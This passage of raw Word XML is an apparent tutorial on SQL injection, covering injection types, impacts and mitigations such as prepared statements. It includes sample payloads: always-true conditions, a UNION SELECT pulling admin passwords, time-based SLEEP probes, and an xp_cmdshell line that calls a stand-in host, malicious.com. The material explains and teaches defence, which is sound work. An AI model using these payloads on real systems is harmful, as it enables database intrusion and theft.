          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">         v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280FABD3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC69FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>|     Database      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29853511">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>| (SQL Execution)   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5A786E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C8501E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131D86DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E92110">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. User Input: Data provided by the user, often through forms or URL parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D7D3C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Application: Where the SQL query is constructed, often insecurely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCBAA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Database: Executes the query which could be manipulated by malicious input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52418345">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE1341C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Types of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D977FD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5080000" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="sq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qli"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5080000" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66243DEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8B2DBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. In-Band SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4756FD8C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Error-Based SQL Injection: Exploits error messages to gain information about the database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211CEDB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C88175C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ```sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C83E2BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ' OR '1'='1' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF4F01F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514334F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       This might return all users if the condition is always true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115519F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8FDB4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Union-Based SQL Injection: Uses the `UNION` operator to combine results from multiple queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1035CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAFE0D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20754B43">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ```sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD5D9C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ' UNION SELECT username, password FROM admin -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9697EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FF4C02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5700B8DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Blind SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDA52E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Boolean-Based Blind SQL Injection: Determines if a statement is true or false based on application responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F78B59B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D829DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2473F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ```sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627611B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ' AND (SELECT SUBSTRING(@@version, 1, 1) = '5') -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7A741D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247F88F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       If the application behaves differently, the attacker can infer details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21858EBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32043AA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Time-Based Blind SQL Injection: Uses time delays to infer true/false conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1EAD4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ED9768">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0332FAF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ```sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC644EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ' OR IF(1=1, SLEEP(5), 0) -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F2AD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A8D598">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       The response time will indicate whether the condition is true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F93564">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C664A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Out-of-Band SQL Injection: Utilizes features of the database to send data to an external server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F0E05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFAF314">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3063266C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     ```sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E16230F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     '; EXEC xp_cmdshell('nslookup malicious.com') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9E541F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2128D40A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C26A684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6893E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2965450" cy="2282190"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="5" name="Picture 5" descr="sq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qli"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2965450" cy="2282190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DE125E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A5C717">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Data Breach: Unauthorized access to sensitive data (e.g., personal information, financial data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD09A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Data Loss: Potential deletion or alteration of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC8085">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Reputation Damage: Loss of customer trust and damage to the organization's brand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008066BC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Financial Loss: Costs associated with remediation, legal fees, and loss of business.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E47810C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="575F391E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mitigation Measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F281735">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10325AEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. Input Validation: Ensure all user inputs are validated and sanitized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67794416">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Parameterized Queries: Use prepared statements to separate SQL logic from data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F8DBF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42654708">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     ```sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EE3B32">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     PreparedStatement stmt = connection.prepareStatement("SELECT * FROM users WHERE id = ?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EFB386">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     stmt.setInt(1, userId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4861EB">
      <w:pPr>
        <w:rPr>
